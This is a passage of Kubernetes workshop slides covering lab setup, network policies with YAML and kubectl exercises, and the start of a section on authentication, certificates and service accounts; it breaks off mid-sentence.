class: title, self-paced Kubernetes Avancé
.nav[*Self-paced version*] .debug[ ``` ``` These slides have been built from commit: fd5c4f7 [shared/title.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/title.md)] --- class: title, in-person Kubernetes Avancé
.footnote[ **Slides[:](https://www.youtube.com/watch?v=h16zyxiwDLY) https://2020-06-enix.container.training/** ] .debug[[shared/title.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/title.md)] --- ## Intros - Hello! We are: - .emoji[👷🏻♀️] AJ ([@s0ulshake](https://twitter.com/s0ulshake), [EphemeraSearch](https://www.ephemerasearch.com/)) - .emoji[🐳] Jérôme ([@jpetazzo](https://twitter.com/jpetazzo), Enix SAS) - The training will run from 9:30 to 13:00 - There will be a break at 11:00 - Feel free to interrupt for questions at any time - *Especially when you see full screen container pictures!* .debug[[logistics.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/logistics.md)] --- ## A brief introduction - This was initially written by [Jérôme Petazzoni](https://twitter.com/jpetazzo) to support in-person, instructor-led workshops and tutorials - Credit is also due to [multiple contributors](https://github.com/jpetazzo/container.training/graphs/contributors) — thank you! - You can also follow along on your own, at your own pace - We included as much information as possible in these slides - We recommend having a mentor to help you ... - ... Or be comfortable spending some time reading the Kubernetes [documentation](https://kubernetes.io/docs/) ... - ... And looking for answers on [StackOverflow](http://stackoverflow.com/questions/tagged/kubernetes) and other outlets .debug[[k8s/intro.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/intro.md)] --- class: self-paced ## Hands on, you shall practice - Nobody ever became a Jedi by spending their lives reading Wookiepedia - Likewise, it will take more than merely *reading* these slides to make you an expert - These slides include *tons* of exercises and examples - They assume that you have access to a Kubernetes cluster - If you are attending a workshop or tutorial:
you will be given specific instructions to access your cluster - If you are doing this on your own:
the first chapter will give you various options to get your own cluster .debug[[k8s/intro.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/intro.md)] --- ## Accessing these slides now - We recommend that you open these slides in your browser: https://2020-06-enix.container.training/ - Use arrows to move to next/previous slide (up, down, left, right, page up, page down) - Type a slide number + ENTER to go to that slide - The slide number is also visible in the URL bar (e.g. .../#123 for slide 123) .debug[[shared/about-slides.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/about-slides.md)] --- ## Accessing these slides later - Slides will remain online so you can review them later if needed (let's say we'll keep them online at least 1 year, how about that?) - You can download the slides using that URL: https://2020-06-enix.container.training/slides.zip (then open the file `4.yml.html`) - You will to find new versions of these slides on: https://container.training/ .debug[[shared/about-slides.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/about-slides.md)] --- ## These slides are open source - You are welcome to use, re-use, share these slides - These slides are written in markdown - The sources of these slides are available in a public GitHub repository: https://github.com/jpetazzo/container.training - Typos? Mistakes? Questions? Feel free to hover over the bottom of the slide ... .footnote[.emoji[👇] Try it! The source file will be shown and you can view it on GitHub and fork and edit it.] .debug[[shared/about-slides.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/about-slides.md)] --- class: extra-details ## Extra details - This slide has a little magnifying glass in the top left corner - This magnifying glass indicates slides that provide extra details - Feel free to skip them if: - you are in a hurry - you are new to this and want to avoid cognitive overload - you want only the most essential information - You can review these slides another time if you want, they'll be waiting for you ☺ .debug[[shared/about-slides.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/about-slides.md)] --- ## Chat room - We've set up a chat room that we will monitor during the workshop - Don't hesitate to use it to ask questions, or get help, or share feedback - The chat room will also be available after the workshop - Join the chat room: [Gitter](https://gitter.im/jpetazzo/formation-highfive-202006) - Say hi in the chat room! .debug[[shared/chat-room-im.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/chat-room-im.md)] --- name: toc-module-1 ## Module 1 - [Pre-requirements](#toc-pre-requirements) - [Network policies](#toc-network-policies) - [Authentication and authorization](#toc-authentication-and-authorization) .debug[(auto-generated TOC)] --- name: toc-module-2 ## Module 2 - [Extending the Kubernetes API](#toc-extending-the-kubernetes-api) - [Operators](#toc-operators) .debug[(auto-generated TOC)] --- name: toc-module-3 ## Module 3 - [Resource Limits](#toc-resource-limits) - [Defining min, max, and default resources](#toc-defining-min-max-and-default-resources) - [Namespace quotas](#toc-namespace-quotas) - [Limiting resources in practice](#toc-limiting-resources-in-practice) - [Checking pod and node resource usage](#toc-checking-pod-and-node-resource-usage) - [Cluster sizing](#toc-cluster-sizing) - [The Horizontal Pod Autoscaler](#toc-the-horizontal-pod-autoscaler) - [Collecting metrics with Prometheus](#toc-collecting-metrics-with-prometheus) .debug[(auto-generated TOC)] --- name: toc-module-4 ## Module 4 - [Stateful sets](#toc-stateful-sets) - [Running a Consul cluster](#toc-running-a-consul-cluster) - [Persistent Volumes Claims](#toc-persistent-volumes-claims) - [Local Persistent Volumes](#toc-local-persistent-volumes) - [Highly available Persistent Volumes](#toc-highly-available-persistent-volumes) .debug[(auto-generated TOC)] --- name: toc-module-5 ## Module 5 - [(Bonus material)](#toc-bonus-material) - [Pod Security Policies](#toc-pod-security-policies) - [Designing an operator](#toc-designing-an-operator) .debug[(auto-generated TOC)] .debug[[shared/toc.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/toc.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/Container-Ship-Freighter-Navigation-Elbe-Romance-1782991.jpg)] --- name: toc-pre-requirements class: title Pre-requirements .nav[ [Previous section](#toc-) | [Back to table of contents](#toc-module-1) | [Next section](#toc-network-policies) ] .debug[(automatically generated title slide)] --- # Pre-requirements - Be comfortable with the UNIX command line - navigating directories - editing files - a little bit of bash-fu (environment variables, loops) - Some Docker knowledge - `docker run`, `docker ps`, `docker build` - ideally, you know how to write a Dockerfile and build it
(even if it's a `FROM` line and a couple of `RUN` commands) - It's totally OK if you are not a Docker expert! .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: title *Tell me and I forget.*
*Teach me and I remember.*
*Involve me and I learn.* Misattributed to Benjamin Franklin [(Probably inspired by Chinese Confucian philosopher Xunzi)](https://www.barrypopik.com/index.php/new_york_city/entry/tell_me_and_i_forget_teach_me_and_i_may_remember_involve_me_and_i_will_lear/) .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- ## Hands-on sections - The whole workshop is hands-on - We are going to build, ship, and run containers! - You are invited to reproduce all the demos - All hands-on sections are clearly identified, like the gray rectangle below .exercise[ - This is the stuff you're supposed to do! - Go to https://2020-06-enix.container.training/ to view these slides ] .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person ## Where are we going to run our containers? .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person, pic ![You get a cluster](images/you-get-a-cluster.jpg) .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person ## You get a cluster of cloud VMs - Each person gets a private cluster of cloud VMs (not shared with anybody else) - They'll remain up for the duration of the workshop - You should have a little card with login+password+IP addresses - You can automatically SSH from one VM to another - The nodes have aliases: `node1`, `node2`, etc. .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person ## Why don't we run containers locally? - Installing this stuff can be hard on some machines (32 bits CPU or OS... Laptops without administrator access... etc.) - *"The whole team downloaded all these container images from the WiFi!
... and it went great!"* (Literally no-one ever) - All you need is a computer (or even a phone or tablet!), with: - an internet connection - a web browser - an SSH client .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person ## SSH clients - On Linux, OS X, FreeBSD... you are probably all set - On Windows, get one of these: - [putty](http://www.putty.org/) - Microsoft [Win32 OpenSSH](https://github.com/PowerShell/Win32-OpenSSH/wiki/Install-Win32-OpenSSH) - [Git BASH](https://git-for-windows.github.io/) - [MobaXterm](http://mobaxterm.mobatek.net/) - On Android, [JuiceSSH](https://juicessh.com/) ([Play Store](https://play.google.com/store/apps/details?id=com.sonelli.juicessh)) works pretty well - Nice-to-have: [Mosh](https://mosh.org/) instead of SSH, if your internet connection tends to lose packets .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person, extra-details ## What is this Mosh thing? *You don't have to use Mosh or even know about it to follow along.
We're just telling you about it because some of us think it's cool!* - Mosh is "the mobile shell" - It is essentially SSH over UDP, with roaming features - It retransmits packets quickly, so it works great even on lossy connections (Like hotel or conference WiFi) - It has intelligent local echo, so it works great even in high-latency connections (Like hotel or conference WiFi) - It supports transparent roaming when your client IP address changes (Like when you hop from hotel to conference WiFi) .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person, extra-details ## Using Mosh - To install it: `(apt|yum|brew) install mosh` - It has been pre-installed on the VMs that we are using - To connect to a remote machine: `mosh user@host` (It is going to establish an SSH connection, then hand off to UDP) - It requires UDP ports to be open (By default, it uses a UDP port between 60000 and 61000) .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- ## WebSSH - The virtual machines are also accessible via WebSSH - This can be useful if: - you can't install an SSH client on your machine - SSH connections are blocked (by firewall or local policy) - To use WebSSH, connect to the IP address of the remote VM on port 1080 (each machine runs a WebSSH server) - Then provide the login and password indicated on your card .debug[[shared/webssh.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/webssh.md)] --- ## Good to know - WebSSH uses WebSocket - If you're having connections issues, try to disable your HTTP proxy (many HTTP proxies can't handle WebSocket properly) - Most keyboard shortcuts should work, except Ctrl-W (as it is hardwired by the browser to "close this tab") .debug[[shared/webssh.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/webssh.md)] --- class: in-person ## Connecting to our lab environment .exercise[ - Log into the first VM (`node1`) with your SSH client: ```bash ssh `user`@`A.B.C.D` ``` (Replace `user` and `A.B.C.D` with the user and IP address provided to you) ] You should see a prompt looking like this: ``` [A.B.C.D] (...) user@node1 ~ $ ``` If anything goes wrong — ask for help! .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- ## Doing or re-doing the workshop on your own? - Use something like [Play-With-Docker](http://play-with-docker.com/) or [Play-With-Kubernetes](https://training.play-with-kubernetes.com/) Zero setup effort; but environment are short-lived and might have limited resources - Create your own cluster (local or cloud VMs) Small setup effort; small cost; flexible environments - Create a bunch of clusters for you and your friends ([instructions](https://github.com/jpetazzo/container.training/tree/master/prepare-vms)) Bigger setup effort; ideal for group training .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- ## For a consistent Kubernetes experience ... - If you are using your own Kubernetes cluster, you can use [shpod](https://github.com/jpetazzo/shpod) - `shpod` provides a shell running in a pod on your own cluster - It comes with many tools pre-installed (helm, stern...) - These tools are used in many exercises in these slides - `shpod` also gives you completion and a fancy prompt .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- class: self-paced ## Get your own Docker nodes - If you already have some Docker nodes: great! - If not: let's get some thanks to Play-With-Docker .exercise[ - Go to http://www.play-with-docker.com/ - Log in - Create your first node ] You will need a Docker ID to use Play-With-Docker. (Creating a Docker ID is free.) .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- ## We will (mostly) interact with node1 only *These remarks apply only when using multiple nodes, of course.* - Unless instructed, **all commands must be run from the first VM, `node1`** - We will only check out/copy the code on `node1` - During normal operations, we do not need access to the other nodes - If we had to troubleshoot issues, we would use a combination of: - SSH (to access system logs, daemon status...) - Docker API (to check running containers and container engine status) .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- ## Terminals Once in a while, the instructions will say:
"Open a new terminal." There are multiple ways to do this: - create a new window or tab on your machine, and SSH into the VM; - use screen or tmux on the VM and open a new window from there. You are welcome to use the method that you feel the most comfortable with. .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- ## Tmux cheatsheet [Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`. *You don't have to use it or even know about it to follow along.
But some of us like to use it to switch between terminals.
It has been preinstalled on your workshop nodes.* - Ctrl-b c → creates a new window - Ctrl-b n → go to next window - Ctrl-b p → go to previous window - Ctrl-b " → split window top/bottom - Ctrl-b % → split window left/right - Ctrl-b Alt-1 → rearrange windows in columns - Ctrl-b Alt-2 → rearrange windows in rows - Ctrl-b arrows → navigate to other windows - Ctrl-b d → detach session - tmux attach → reattach to session .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/ShippingContainerSFBay.jpg)] --- name: toc-network-policies class: title Network policies .nav[ [Previous section](#toc-pre-requirements) | [Back to table of contents](#toc-module-1) | [Next section](#toc-authentication-and-authorization) ] .debug[(automatically generated title slide)] --- # Network policies - Namespaces help us to *organize* resources - Namespaces do not provide isolation - By default, every pod can contact every other pod - By default, every service accepts traffic from anyone - If we want this to be different, we need *network policies* .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## What's a network policy? A network policy is defined by the following things. - A *pod selector* indicating which pods it applies to e.g.: "all pods in namespace `blue` with the label `zone=internal`" - A list of *ingress rules* indicating which inbound traffic is allowed e.g.: "TCP connections to ports 8000 and 8080 coming from pods with label `zone=dmz`, and from the external subnet 4.42.6.0/24, except 4.42.6.5" - A list of *egress rules* indicating which outbound traffic is allowed A network policy can provide ingress rules, egress rules, or both. .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## How do network policies apply? - A pod can be "selected" by any number of network policies - If a pod isn't selected by any network policy, then its traffic is unrestricted (In other words: in the absence of network policies, all traffic is allowed) - If a pod is selected by at least one network policy, then all traffic is blocked ... ... unless it is explicitly allowed by one of these network policies .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- class: extra-details ## Traffic filtering is flow-oriented - Network policies deal with *connections*, not individual packets - Example: to allow HTTP (80/tcp) connections to pod A, you only need an ingress rule (You do not need a matching egress rule to allow response traffic to go through) - This also applies for UDP traffic (Allowing DNS traffic can be done with a single rule) - Network policy implementations use stateful connection tracking .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Pod-to-pod traffic - Connections from pod A to pod B have to be allowed by both pods: - pod A has to be unrestricted, or allow the connection as an *egress* rule - pod B has to be unrestricted, or allow the connection as an *ingress* rule - As a consequence: if a network policy restricts traffic going from/to a pod,
the restriction cannot be overridden by a network policy selecting another pod - This prevents an entity managing network policies in namespace A (but without permission to do so in namespace B) from adding network policies giving them access to namespace B .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## The rationale for network policies - In network security, it is generally considered better to "deny all, then allow selectively" (The other approach, "allow all, then block selectively" makes it too easy to leave holes) - As soon as one network policy selects a pod, the pod enters this "deny all" logic - Further network policies can open additional access - Good network policies should be scoped as precisely as possible - In particular: make sure that the selector is not too broad (Otherwise, you end up affecting pods that were otherwise well secured) .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Our first network policy This is our game plan: - run a web server in a pod - create a network policy to block all access to the web server - create another network policy to allow access only from specific pods .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Running our test web server .exercise[ - Let's use the `nginx` image: ```bash kubectl create deployment testweb --image=nginx ``` - Find out the IP address of the pod with one of these two commands: ```bash kubectl get pods -o wide -l app=testweb IP=$(kubectl get pods -l app=testweb -o json | jq -r .items[0].status.podIP) ``` - Check that we can connect to the server: ```bash curl $IP ``` ] The `curl` command should show us the "Welcome to nginx!" page. .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Adding a very restrictive network policy - The policy will select pods with the label `app=testweb` - It will specify an empty list of ingress rules (matching nothing) .exercise[ - Apply the policy in this YAML file: ```bash kubectl apply -f ~/container.training/k8s/netpol-deny-all-for-testweb.yaml ``` - Check if we can still access the server: ```bash curl $IP ``` ] The `curl` command should now time out. .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Looking at the network policy This is the file that we applied: ```yaml kind: NetworkPolicy apiVersion: networking.k8s.io/v1 metadata: name: deny-all-for-testweb spec: podSelector: matchLabels: app: testweb ingress: [] ``` .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Allowing connections only from specific pods - We want to allow traffic from pods with the label `run=testcurl` - Reminder: this label is automatically applied when we do `kubectl run testcurl ...` .exercise[ - Apply another policy: ```bash kubectl apply -f ~/container.training/k8s/netpol-allow-testcurl-for-testweb.yaml ``` ] .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Looking at the network policy This is the second file that we applied: ```yaml kind: NetworkPolicy apiVersion: networking.k8s.io/v1 metadata: name: allow-testcurl-for-testweb spec: podSelector: matchLabels: app: testweb ingress: - from: - podSelector: matchLabels: run: testcurl ``` .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Testing the network policy - Let's create pods with, and without, the required label .exercise[ - Try to connect to testweb from a pod with the `run=testcurl` label: ```bash kubectl run testcurl --rm -i --image=centos -- curl -m3 $IP ``` - Try to connect to testweb with a different label: ```bash kubectl run testkurl --rm -i --image=centos -- curl -m3 $IP ``` ] The first command will work (and show the "Welcome to nginx!" page). The second command will fail and time out after 3 seconds. (The timeout is obtained with the `-m3` option.) .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## An important warning - Some network plugins only have partial support for network policies - For instance, Weave added support for egress rules [in version 2.4](https://github.com/weaveworks/weave/pull/3313) (released in July 2018) - But only recently added support for ipBlock [in version 2.5](https://github.com/weaveworks/weave/pull/3367) (released in Nov 2018) - Unsupported features might be silently ignored (Making you believe that you are secure, when you're not) .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Network policies, pods, and services - Network policies apply to *pods* - A *service* can select multiple pods (And load balance traffic across them) - It is possible that we can connect to some pods, but not some others (Because of how network policies have been defined for these pods) - In that case, connections to the service will randomly pass or fail (Depending on whether the connection was sent to a pod that we have access to or not) .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Network policies and namespaces - A good strategy is to isolate a namespace, so that: - all the pods in the namespace can communicate together - other namespaces cannot access the pods - external access has to be enabled explicitly - Let's see what this would look like for the DockerCoins app! .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Network policies for DockerCoins - We are going to apply two policies - The first policy will prevent traffic from other namespaces - The second policy will allow traffic to the `webui` pods - That's all we need for that app! .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Blocking traffic from other namespaces This policy selects all pods in the current namespace. It allows traffic only from pods in the current namespace. (An empty `podSelector` means "all pods.") ```yaml kind: NetworkPolicy apiVersion: networking.k8s.io/v1 metadata: name: deny-from-other-namespaces spec: podSelector: {} ingress: - from: - podSelector: {} ``` .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Allowing traffic to `webui` pods This policy selects all pods with label `app=webui`. It allows traffic from any source. (An empty `from` field means "all sources.") ```yaml kind: NetworkPolicy apiVersion: networking.k8s.io/v1 metadata: name: allow-webui spec: podSelector: matchLabels: app: webui ingress: - from: [] ``` .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Applying both network policies - Both network policies are declared in the file `k8s/netpol-dockercoins.yaml` .exercise[ - Apply the network policies: ```bash kubectl apply -f ~/container.training/k8s/netpol-dockercoins.yaml ``` - Check that we can still access the web UI from outside
(and that the app is still working correctly!) - Check that we can't connect anymore to `rng` or `hasher` through their ClusterIP ] Note: using `kubectl proxy` or `kubectl port-forward` allows us to connect regardless of existing network policies. This allows us to debug and troubleshoot easily, without having to poke holes in our firewall. .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Cleaning up our network policies - The network policies that we have installed block all traffic to the default namespace - We should remove them, otherwise further exercises will fail! .exercise[ - Remove all network policies: ```bash kubectl delete networkpolicies --all ``` ] .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Protecting the control plane - Should we add network policies to block unauthorized access to the control plane? (etcd, API server, etc.) -- - At first, it seems like a good idea ... -- - But it *shouldn't* be necessary: - not all network plugins support network policies - the control plane is secured by other methods (mutual TLS, mostly) - the code running in our pods can reasonably expect to contact the API
(and it can do so safely thanks to the API permission model) - If we block access to the control plane, we might disrupt legitimate code - ...Without necessarily improving security .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Further resources - As always, the [Kubernetes documentation](https://kubernetes.io/docs/concepts/services-networking/network-policies/) is a good starting point - The API documentation has a lot of detail about the format of various objects: - [NetworkPolicy](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.12/#networkpolicy-v1-networking-k8s-io) - [NetworkPolicySpec](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.12/#networkpolicyspec-v1-networking-k8s-io) - [NetworkPolicyIngressRule](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.12/#networkpolicyingressrule-v1-networking-k8s-io) - etc. - And two resources by [Ahmet Alp Balkan](https://ahmet.im/): - a [very good talk about network policies](https://www.youtube.com/watch?list=PLj6h78yzYM2P-3-xqvmWaZbbI1sW-ulZb&v=3gGpMmYeEO8) at KubeCon North America 2017 - a repository of [ready-to-use recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes) for network policies ??? :EN:- Isolating workloads with Network Policies :FR:- Isolation réseau avec les *network policies* .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/aerial-view-of-containers.jpg)] --- name: toc-authentication-and-authorization class: title Authentication and authorization .nav[ [Previous section](#toc-network-policies) | [Back to table of contents](#toc-module-1) | [Next section](#toc-extending-the-kubernetes-api) ] .debug[(automatically generated title slide)] --- # Authentication and authorization - In this section, we will: - define authentication and authorization - explain how they are implemented in Kubernetes - talk about tokens, certificates, service accounts, RBAC ... - But first: why do we need all this? .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## The need for fine-grained security - The Kubernetes API should only be available for identified users - we don't want "guest access" (except in very rare scenarios) - we don't want strangers to use our compute resources, delete our apps ... - our keys and passwords should not be exposed to the public - Users will often have different access rights - cluster admin (similar to UNIX "root") can do everything - developer might access specific resources, or a specific namespace - supervision might have read only access to *most* resources .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Example: custom HTTP load balancer - Let's imagine that we have a custom HTTP load balancer for multiple apps - Each app has its own *Deployment* resource - By default, the apps are "sleeping" and scaled to zero - When a request comes in, the corresponding app gets woken up - After some inactivity, the app is scaled down again - This HTTP load balancer needs API access (to scale up/down) - What if *a wild vulnerability appears*? .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Consequences of vulnerability - If the HTTP load balancer has the same API access as we do: *full cluster compromise (easy data leak, cryptojacking...)* - If the HTTP load balancer has `update` permissions on the Deployments: *defacement (easy), MITM / impersonation (medium to hard)* - If the HTTP load balancer only has permission to `scale` the Deployments: *denial-of-service* - All these outcomes are bad, but some are worse than others .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Definitions - Authentication = verifying the identity of a person On a UNIX system, we can authenticate with login+password, SSH keys ... - Authorization = listing what they are allowed to do On a UNIX system, this can include file permissions, sudoer entries ... - Sometimes abbreviated as "authn" and "authz" - In good modular systems, these things are decoupled (so we can e.g. change a password or SSH key without having to reset access rights) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Authentication in Kubernetes - When the API server receives a request, it tries to authenticate it (it examines headers, certificates... anything available) - Many authentication methods are available and can be used simultaneously (we will see them on the next slide) - It's the job of the authentication method to produce: - the user name - the user ID - a list of groups - The API server doesn't interpret these; that'll be the job of *authorizers* .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Authentication methods - TLS client certificates (that's what we've been doing with `kubectl` so far) - Bearer tokens (a secret token in the HTTP headers of the request) - [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication) (carrying user and password in an HTTP header) - Authentication proxy (sitting in front of the API and setting trusted headers) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Anonymous requests - If any authentication method *rejects* a request, it's denied (`401 Unauthorized` HTTP code) - If a request is neither rejected nor accepted by anyone, it's anonymous - the user name is `system:anonymous` - the list of groups is `[system:unauthenticated]` - By default, the anonymous user can't do anything (that's what you get if you just `curl` the Kubernetes API) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Authentication with TLS certificates - This is enabled in most Kubernetes deployments - The user name is derived from the `CN` in the client certificates - The groups are derived from the `O` fields in the client certificate - From the point of view of the Kubernetes API, users do not exist (i.e. they are not stored in etcd or anywhere else) - Users can be created (and added to groups) independently of the API - The Kubernetes API can be set up to use your custom CA to validate client certs .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Viewing our admin certificate - Let's inspect the certificate we've been using all this time! .exercise[ - This command will show the `CN` and `O` fields for our certificate: ```bash kubectl config view \ --raw \ -o json \ | jq -r .users[0].user[\"client-certificate-data\"] \ | openssl base64 -d -A \ | openssl x509 -text \ | grep Subject: ``` ] Let's break down that command together! 😅 .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Breaking down the command - `kubectl config view` shows the Kubernetes user configuration - `--raw` includes certificate information (which shows as REDACTED otherwise) - `-o json` outputs the information in JSON format - `| jq ...` extracts the field with the user certificate (in base64) - `| openssl base64 -d -A` decodes the base64 format (now we have a PEM file) - `| openssl x509 -text` parses the certificate and outputs it as plain text - `| grep Subject:` shows us the line that interests us → We are user `kubernetes-admin`, in group `system:masters`. (We will see later how and why this gives us the permissions that we have.) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## User certificates in practice - The Kubernetes API server does not support certificate revocation (see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982)) - As a result, we don't have an easy way to terminate someone's access (if their key is compromised, or they leave the organization) - Option 1: re-create a new CA and re-issue everyone's certificates
→ Maybe OK if we only have a few users; no way otherwise - Option 2: don't use groups; grant permissions to individual users
→ Inconvenient if we have many users and teams; error-prone - Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Authentication with tokens - Tokens are passed as HTTP headers: `Authorization: Bearer and-then-here-comes-the-token` - Tokens can be validated through a number of different methods: - static tokens hard-coded in a file on the API server - [bootstrap tokens](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/) (special case to create a cluster or join nodes) - [OpenID Connect tokens](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#openid-connect-tokens) (to delegate authentication to compatible OAuth2 providers) - service accounts (these deserve more details, coming right up!) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Service accounts - A service account is a user that exists in the Kubernetes API (it is visible with e.g. `kubectl get serviceaccounts`) - Service accounts can therefore be created / updated dynamically (they don't require hand-editing a file and restarting the API server) - A service account is associated with a set of secrets (the kind that you can view with `kubectl get secrets`) - Service accounts are generally used to grant permissions to applications, services... (as opposed 